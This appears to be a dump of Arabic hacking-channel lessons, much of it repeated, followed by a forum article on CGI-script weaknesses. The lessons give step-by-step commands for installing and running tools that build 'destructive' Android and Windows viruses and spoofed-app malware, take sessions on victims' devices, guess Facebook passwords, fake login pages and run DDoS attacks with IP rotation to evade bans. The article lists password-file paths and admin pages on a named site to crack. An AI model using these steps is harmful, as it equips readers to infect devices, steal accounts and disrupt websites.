#الدرس_العاشر
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater
طريقه تثبيتها:::-
الاوامر
1- git clone https://github.com/ERROR4317/viruscreater
2- cd viruscreater
أمر التشغيل
3- python2 virus.py
انا اخترت رقم 2
صناعه فيروسات قويه و ب انواع مختلفه
#CS
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater
طريقه تثبيتها:::-
الاوامر
1- git clone https://github.com/ERROR4317/viruscreater
2- cd viruscreater
أمر التشغيل
3- python2 virus.py
انا اخترت رقم 2
صناعه فيروسات قويه و ب انواع مختلفه
#CS
GitHub
GitHub - ERROR4317/viruscreater
Contribute to ERROR4317/viruscreater development by creating an account on GitHub.
#الدرس_11
اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
#CS
اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
#CS
#الدرس_12
تم تحديث اداه payload5
هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help
للتحديث قم بكتابه 99
تثبيت اداة Payload 5
pkg install git -y
git clone https://github.com/Ali898989/setupp
cd setupp
chmod +x setup.sh
./setup.sh
cd payload5
#CS
تم تحديث اداه payload5
هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help
للتحديث قم بكتابه 99
تثبيت اداة Payload 5
pkg install git -y
git clone https://github.com/Ali898989/setupp
cd setupp
chmod +x setup.sh
./setup.sh
cd payload5
#CS
GitHub
GitHub - Ali898989/setupp
Contribute to Ali898989/setupp development by creating an account on GitHub.
#الدرس_13
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض
الشرح مقدم من
#CS
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض
الشرح مقدم من
#CS
GitHub
GitHub - Junior60/vbug
Contribute to Junior60/vbug development by creating an account on GitHub.
⭐هجمات ال DDOS الدوس اتاك
#الدرس_14
هجمات ال DDOS هي عبارة عن حزمات كبيرة من الملفات يتم ارسالها الى الموقع المستهدف بهدف تعطيله او حجبه عن العمل من خلال اغراق سيرفر الموقع بالبيانات الغير لازمة
والهجوم المنفرد لن يؤثر بشيء على الموقع في حال قيامك ب الدوس اتاك لوحدك سيكون تأثيرك على الموقع شبه معدوم
للقيام بهجوم دوس اتاك ناجح تحتاج الى مجموعة كبيرة من المشاركين، للمشاركة بهجوم جماعي
وهناك بعض المواقع تقوم بحظر ال IP الخاص بك في حال قمت بعمل DDOS على الموقع لفترة طويلة
لتجنب ان يقوم سيرفر الموقع بحظر ال ip الخاص بك قم بإستخدام برامج او ادوات تغيير ال ip وانصح بتغيير ال ip الخاص بك كل 15 دقيقة
ويجب على جميع المشاركين بالهجوم القيام بالخطوات نفسها لتجنب الحظر.
⭐الهجوم على IP راوتر
وفي حالك القيام ب ping مع اصدقائك على IP راوتر مُعين فالهجوم لايقوم بإحراق الراوتر كما يعتقد البعض إنما يقوم الراوتر بإجراء امان ويعود الى اعدادته الأساسية للشركة المصنعة وبالنسبة للراوترات القديمة فإن الراوتر يدخل في حالة ايقاف تشغيل مؤقت ومن ثم يعود للعمل بشكل طبيعي.
⭐هجوم Ping على ip جهاز
وبالنسبة للping على ايبيهات الأجهزة (الهجوم الجماعي) فأيضا مثل مبدء الهجوم على الراوتر
عند الضغط الشديد على الجهاز سيقوم الجهاز بإعادة الإقلاع واعادة التشغيل في حال كان الجهاز من النوع القديم والضعيف فسيتضرر المعالج الخاص بالجهاز.
#CS
#الدرس_14
هجمات ال DDOS هي عبارة عن حزمات كبيرة من الملفات يتم ارسالها الى الموقع المستهدف بهدف تعطيله او حجبه عن العمل من خلال اغراق سيرفر الموقع بالبيانات الغير لازمة
والهجوم المنفرد لن يؤثر بشيء على الموقع في حال قيامك ب الدوس اتاك لوحدك سيكون تأثيرك على الموقع شبه معدوم
للقيام بهجوم دوس اتاك ناجح تحتاج الى مجموعة كبيرة من المشاركين، للمشاركة بهجوم جماعي
وهناك بعض المواقع تقوم بحظر ال IP الخاص بك في حال قمت بعمل DDOS على الموقع لفترة طويلة
لتجنب ان يقوم سيرفر الموقع بحظر ال ip الخاص بك قم بإستخدام برامج او ادوات تغيير ال ip وانصح بتغيير ال ip الخاص بك كل 15 دقيقة
ويجب على جميع المشاركين بالهجوم القيام بالخطوات نفسها لتجنب الحظر.
⭐الهجوم على IP راوتر
وفي حالك القيام ب ping مع اصدقائك على IP راوتر مُعين فالهجوم لايقوم بإحراق الراوتر كما يعتقد البعض إنما يقوم الراوتر بإجراء امان ويعود الى اعدادته الأساسية للشركة المصنعة وبالنسبة للراوترات القديمة فإن الراوتر يدخل في حالة ايقاف تشغيل مؤقت ومن ثم يعود للعمل بشكل طبيعي.
⭐هجوم Ping على ip جهاز
وبالنسبة للping على ايبيهات الأجهزة (الهجوم الجماعي) فأيضا مثل مبدء الهجوم على الراوتر
عند الضغط الشديد على الجهاز سيقوم الجهاز بإعادة الإقلاع واعادة التشغيل في حال كان الجهاز من النوع القديم والضعيف فسيتضرر المعالج الخاص بالجهاز.
#CS
توجد ادوات كثيرة لضرب المواقع ولكن في النهاية الوظيفة واحدة وهي حجب الخدمة عن الموقع عن طريق ارسال حزم بيانات متتالية حتي لا يستطيع الموقع للاستجابة مرة اخري
الان كيف يتم الهجوم علي المواقع
-يمكن الهجوم علي المواقع عن طريق نظام الكالي لينكس او cmd او اي شئ له القدرة علي ذلك...ويمكنك ذلك عن طريق الهاتف او الكمبيوتر أو عن طريق ادوات
#CS
الان كيف يتم الهجوم علي المواقع
-يمكن الهجوم علي المواقع عن طريق نظام الكالي لينكس او cmd او اي شئ له القدرة علي ذلك...ويمكنك ذلك عن طريق الهاتف او الكمبيوتر أو عن طريق ادوات
#CS
Forwarded from نكات _وخواطر عميقه ❤️💛❣️ (Hiba Elgadi)
لا تـحاولو إرشـادي إلـى الـطريق الـصواب ..
لإنـكم لـو كـنتم تـمشون فـيه لـما إلـتقينا . . .😂😂😂😂😂😂
😂💔🐸🌚
-
لإنـكم لـو كـنتم تـمشون فـيه لـما إلـتقينا . . .😂😂😂😂😂😂
😂💔🐸🌚
-
شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
#CS
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
#CS
GitHub
GitHub - bdblackhat/admin-panel-finder: A Python Script to find admin panel of a site
A Python Script to find admin panel of a site. Contribute to bdblackhat/admin-panel-finder development by creating an account on GitHub.

Sign In Sign-Up
 الصفحة الرئيسيةمنتدى زعبيلمواقع اسلاميهدفتر الزواركلمة الاسبواعبطاقاتgoogle
اختراق المواقع عن طريق ثغرة CGIاختراق المواقع عن طريق ثغرة CGI
1.1 مقدمة
1.2 شرح بسيط
1.3 ماهي CGI-Scripts ؟
1.4 اختراق CGI-Scripts أو استخدام CGI-Scripts للاختراق !!
1.5 لماذا بعض CGI-Scripts سهلة ومعرضة للاختراق ؟
1.6 نقاط ضعف Scripts وكيف اقوم باخترقها ؟
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
1.8 الحلول الممكنة Solutions
1.9 كلمة أخيرة ...
1.1 مقدمة
++++++++++++++++++++++++
سوف نشرح في هذا الموضوع نقاط ضعف Cgi-Scripts
الغرض من الموضوع هو ليس لكيفية الاختراق انما لكيفية معالجة المشاكل وحماية موقعك اذا كنت تملك واحد
لذلك أنا غير مسؤول عن أي ضرر قد تحدثه فهدفنا في الموضوع التعليم للحماية وليس للاختراق
1.2 شرح بسيط
++++++++++++++++++++++++
من مدة قليلة كنت أقرا كثير عن أمن CGI لكني اجهل ماهو كيف هو ماذا يحتوي ماذا يسبب ؟؟
كل هذي الاسئلة ماكان عندي جواب لها ابدأ بس مع قرائتي لعدة مواضيع باللغة الإنجليزية عن لغة CGI
بديت افهم في اللغة وفي الخدمة أيضا التي تقدمها المواقع وفي يوم حاولت اشوف ملف cgi-bin وقدرت ادخله لكن هذا كان من زمان لان الحين طلع له حمايات كثيرة وتصريحات تمنعك من عرض هذا الملف او يعطيك رسالة
Access Denied
واحيانا Bad Link
او ألاخطاء الشائعة
403
او يعرض لك غير مسموح به !
وبديت احس ان الدليل او المجلد
CGI-BIN/
يحتوي على سكربتات CGI كلها ...
طبعا قديما نقدر نستعرض الملف
password.txt
وملف يشمل ايضا على UserName و Password الخاص بصاحب الموقع
اذا كنت تبغى تعرف الكثير عن CGI حاول تاخذ لك دورة في لغة CGI وايضا لغة Perl
1.3 ماهي CGI-Scripts ؟
++++++++++++++++++++++++
عارف ان ولا واحد فيكم يقدر يصبر عشان يتعلم كيف يخترق CGI-Sripts لكن عليك اولا ان تعرف ولو بالشيء المختصر عن CGI-Sripts
اول شي CGI تعني
Common Gateway Interface
(واجه المدخل الشائع)
وسكربتات CGI تسمح لصفحات المواقع ان تكون متصلة ومتفاعلة مع البرامج التنفيذية الموجودة على الموقع
سجل الزوار مثلا ...
على سبيل المثال لو اشتركت في MailingList يعني قائمة إيميلات لمعرفة كل جديد سوف يضاف إيميلك ضمن قائمة الإيميلات وراح تستلم اسبوعيا او يوميا ايميل ورسالة وهذي عملية تحدث Automatic
يعني لايحتاج إلى أن يقوم صاحب الموقع بإضافة هذه الإيميلات في قائمة لا !!
CGI-Script تقوم باختصار التعب وتفعل ذلك لأجلك .
1.4 اختراق CGI-Scripts أو استخدام CGI-Scripts للاختراق !!
++++++++++++++++++++++++
هنالك اختلاف مهم يجب ان اطلعكم عليه هو :
استخدام CGI-Scripts للاختراق وهي عن طريق (استغلال) Exploit (ثغرة) Vulnerable في CGI-Scripts للزيادة في الدخول إلى السيرفر
هذا الأكثر تعقيدا وضررا عن اختراق CGI-Scripts
لكن هذولي الموضوعين لدينا الكثير لنتحدث عنهم
في هذا الموضوع راح اشرح لكم
اختراق CGI-Scripts
اما استخدام CGI-Scripts للاختراق هذا انشاء الله يكون درسنا الثاني يااخواني
1.5 لماذا بعض CGI-Scripts سهلة ومعرضة للاختراق ؟
++++++++++++++++++++++++
السبب وذلك أن العديد من السكربتات الي تستخدم في الإنترنت مجانية أي :
Free CGI-Scripts
والتي تكتب بالـhobbyists
لذلك هذا النوع من السكربتات لديه مشاكل عديدة ويمكن ان يستغلها الهكرز ويقوم بإستعراض ملفات انت لك الصلاحية وحدك فقط باستعراضها
1.6 نقاط ضعف Scripts وكيف اقوم باخترقها ؟
++++++++++++++++++++++++
المفكرة CGI Script By Matt Kruse
أي سكربت CGI الخاص بالتقويم بواسطة Matt Kruse
إحدى السكربتات التي وجدتا مصابة بثغرات هي المفكرة Script
هذا السكربت مثل الاسم تقريبا الي يسمح بإمكانك ان يصبح لك المفكرة أي : تقويم في صفحتك الرئيسية
وقد تجد المفكرة Script في مجلد CGI-BIN/
وقد تحتوي على calendar
ملف Config
calendar.cfg
يشمل ويحتوي على كلمات المرور الخاصة بكل من UserName والـAdminstrator التي نحتاجها للقيام بالتعديل على السكربتات
طبعا الملف calendar.cfg
ملف مهم جدا ويحتوي على الباسوورد مع اسماء المستخدمين
لكنها مشفرة بمقياس DES
لاحاجة لكي أقول لكم أي برنامج تستخدم
John The Riper فهو الحاص بكسر باسوورد من هذا النوع وايضا نستطيع استخدامه على MD5
ملف calendar.cfg راح تجده في هذا المكان
http://www.modammer.com/cgi-bin/calendar/calendar.cfg
بعد ماتطلع الباسوورد وتقوم بفك تشفيره اذهب إلى هنا
http://www.modammer.com/cgi-bin/cal..._admin.pl?admin
هذا بالنسبة للـالمفكرة
-------------------------------
وهنالك ثغرة عن WebBBS Script بواسطة Darryl C. Burgdorf
WebBBS Script
هو عبارة عن نظام لوحة إعلانات شبيهة بالمنتديات
ودليل (مجلد) WebBBS
يحتوي على معلومات شخصية خاصة لأشخاص لديهم حساب في هذه اللوحة لكن أيضا سوف تجد الب
Sign In Sign-Up
 الصفحة الرئيسيةمنتدى زعبيلمواقع اسلاميهدفتر الزواركلمة الاسبواعبطاقاتgoogle
اختراق المواقع عن طريق ثغرة CGIاختراق المواقع عن طريق ثغرة CGI
1.1 مقدمة
1.2 شرح بسيط
1.3 ماهي CGI-Scripts ؟
1.4 اختراق CGI-Scripts أو استخدام CGI-Scripts للاختراق !!
1.5 لماذا بعض CGI-Scripts سهلة ومعرضة للاختراق ؟
1.6 نقاط ضعف Scripts وكيف اقوم باخترقها ؟
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
1.8 الحلول الممكنة Solutions
1.9 كلمة أخيرة ...
1.1 مقدمة
++++++++++++++++++++++++
سوف نشرح في هذا الموضوع نقاط ضعف Cgi-Scripts
الغرض من الموضوع هو ليس لكيفية الاختراق انما لكيفية معالجة المشاكل وحماية موقعك اذا كنت تملك واحد
لذلك أنا غير مسؤول عن أي ضرر قد تحدثه فهدفنا في الموضوع التعليم للحماية وليس للاختراق
1.2 شرح بسيط
++++++++++++++++++++++++
من مدة قليلة كنت أقرا كثير عن أمن CGI لكني اجهل ماهو كيف هو ماذا يحتوي ماذا يسبب ؟؟
كل هذي الاسئلة ماكان عندي جواب لها ابدأ بس مع قرائتي لعدة مواضيع باللغة الإنجليزية عن لغة CGI
بديت افهم في اللغة وفي الخدمة أيضا التي تقدمها المواقع وفي يوم حاولت اشوف ملف cgi-bin وقدرت ادخله لكن هذا كان من زمان لان الحين طلع له حمايات كثيرة وتصريحات تمنعك من عرض هذا الملف او يعطيك رسالة
Access Denied
واحيانا Bad Link
او ألاخطاء الشائعة
403
او يعرض لك غير مسموح به !
وبديت احس ان الدليل او المجلد
CGI-BIN/
يحتوي على سكربتات CGI كلها ...
طبعا قديما نقدر نستعرض الملف
password.txt
وملف يشمل ايضا على UserName و Password الخاص بصاحب الموقع
اذا كنت تبغى تعرف الكثير عن CGI حاول تاخذ لك دورة في لغة CGI وايضا لغة Perl
1.3 ماهي CGI-Scripts ؟
++++++++++++++++++++++++
عارف ان ولا واحد فيكم يقدر يصبر عشان يتعلم كيف يخترق CGI-Sripts لكن عليك اولا ان تعرف ولو بالشيء المختصر عن CGI-Sripts
اول شي CGI تعني
Common Gateway Interface
(واجه المدخل الشائع)
وسكربتات CGI تسمح لصفحات المواقع ان تكون متصلة ومتفاعلة مع البرامج التنفيذية الموجودة على الموقع
سجل الزوار مثلا ...
على سبيل المثال لو اشتركت في MailingList يعني قائمة إيميلات لمعرفة كل جديد سوف يضاف إيميلك ضمن قائمة الإيميلات وراح تستلم اسبوعيا او يوميا ايميل ورسالة وهذي عملية تحدث Automatic
يعني لايحتاج إلى أن يقوم صاحب الموقع بإضافة هذه الإيميلات في قائمة لا !!
CGI-Script تقوم باختصار التعب وتفعل ذلك لأجلك .
1.4 اختراق CGI-Scripts أو استخدام CGI-Scripts للاختراق !!
++++++++++++++++++++++++
هنالك اختلاف مهم يجب ان اطلعكم عليه هو :
استخدام CGI-Scripts للاختراق وهي عن طريق (استغلال) Exploit (ثغرة) Vulnerable في CGI-Scripts للزيادة في الدخول إلى السيرفر
هذا الأكثر تعقيدا وضررا عن اختراق CGI-Scripts
لكن هذولي الموضوعين لدينا الكثير لنتحدث عنهم
في هذا الموضوع راح اشرح لكم
اختراق CGI-Scripts
اما استخدام CGI-Scripts للاختراق هذا انشاء الله يكون درسنا الثاني يااخواني
1.5 لماذا بعض CGI-Scripts سهلة ومعرضة للاختراق ؟
++++++++++++++++++++++++
السبب وذلك أن العديد من السكربتات الي تستخدم في الإنترنت مجانية أي :
Free CGI-Scripts
والتي تكتب بالـhobbyists
لذلك هذا النوع من السكربتات لديه مشاكل عديدة ويمكن ان يستغلها الهكرز ويقوم بإستعراض ملفات انت لك الصلاحية وحدك فقط باستعراضها
1.6 نقاط ضعف Scripts وكيف اقوم باخترقها ؟
++++++++++++++++++++++++
المفكرة CGI Script By Matt Kruse
أي سكربت CGI الخاص بالتقويم بواسطة Matt Kruse
إحدى السكربتات التي وجدتا مصابة بثغرات هي المفكرة Script
هذا السكربت مثل الاسم تقريبا الي يسمح بإمكانك ان يصبح لك المفكرة أي : تقويم في صفحتك الرئيسية
وقد تجد المفكرة Script في مجلد CGI-BIN/
وقد تحتوي على calendar
ملف Config
calendar.cfg
يشمل ويحتوي على كلمات المرور الخاصة بكل من UserName والـAdminstrator التي نحتاجها للقيام بالتعديل على السكربتات
طبعا الملف calendar.cfg
ملف مهم جدا ويحتوي على الباسوورد مع اسماء المستخدمين
لكنها مشفرة بمقياس DES
لاحاجة لكي أقول لكم أي برنامج تستخدم
John The Riper فهو الحاص بكسر باسوورد من هذا النوع وايضا نستطيع استخدامه على MD5
ملف calendar.cfg راح تجده في هذا المكان
http://www.modammer.com/cgi-bin/calendar/calendar.cfg
بعد ماتطلع الباسوورد وتقوم بفك تشفيره اذهب إلى هنا
http://www.modammer.com/cgi-bin/cal..._admin.pl?admin
هذا بالنسبة للـالمفكرة
-------------------------------
وهنالك ثغرة عن WebBBS Script بواسطة Darryl C. Burgdorf
WebBBS Script
هو عبارة عن نظام لوحة إعلانات شبيهة بالمنتديات
ودليل (مجلد) WebBBS
يحتوي على معلومات شخصية خاصة لأشخاص لديهم حساب في هذه اللوحة لكن أيضا سوف تجد الب
اسوورد وهي مشفرة كالسابق على مقياس DES
فك تشفيرها وانتهينا
ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/
-------------------------------
WebAdverts Script بواسطة Darryl C. Burgdorf
كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة
المحل الرئيسي للباسوورد الموجود في Webadverts هو:
http://www.modammer.com/cgi-bin/advert/adpassword.txt
بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :
http://www.modammer.com/cgi-bin/advert/ads_admin.pl
-------------------------------
WWWBoard Script
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن
cgi-bin/wwwebboard أو webboard/password.txt
-------------------------------
Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList
عليك برؤية ملف addresses.txt
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك
كثير من CGI-Maillists تحتوي على هذه الأخطاء
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt
http://www.modammer.com/cgi-bin/mail/addresses.txt
وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى
http://www.modammer.com/cgi-bin/maillist/subscribe.htm
***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق
الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/
وفيه برنامج جميل احب اطلعكم عليه وهو
Intellitamper
يسمح لك بمعرفة الملفات على السيرفر
(راح يساعدك كثير)
الموقع:www.intellitamper.com
1.8 الحلول الممكنة Solutions
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/
حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
#cs
فك تشفيرها وانتهينا
ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/
-------------------------------
WebAdverts Script بواسطة Darryl C. Burgdorf
كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة
المحل الرئيسي للباسوورد الموجود في Webadverts هو:
http://www.modammer.com/cgi-bin/advert/adpassword.txt
بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :
http://www.modammer.com/cgi-bin/advert/ads_admin.pl
-------------------------------
WWWBoard Script
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن
cgi-bin/wwwebboard أو webboard/password.txt
-------------------------------
Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList
عليك برؤية ملف addresses.txt
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك
كثير من CGI-Maillists تحتوي على هذه الأخطاء
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt
http://www.modammer.com/cgi-bin/mail/addresses.txt
وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى
http://www.modammer.com/cgi-bin/maillist/subscribe.htm
***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************
1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق
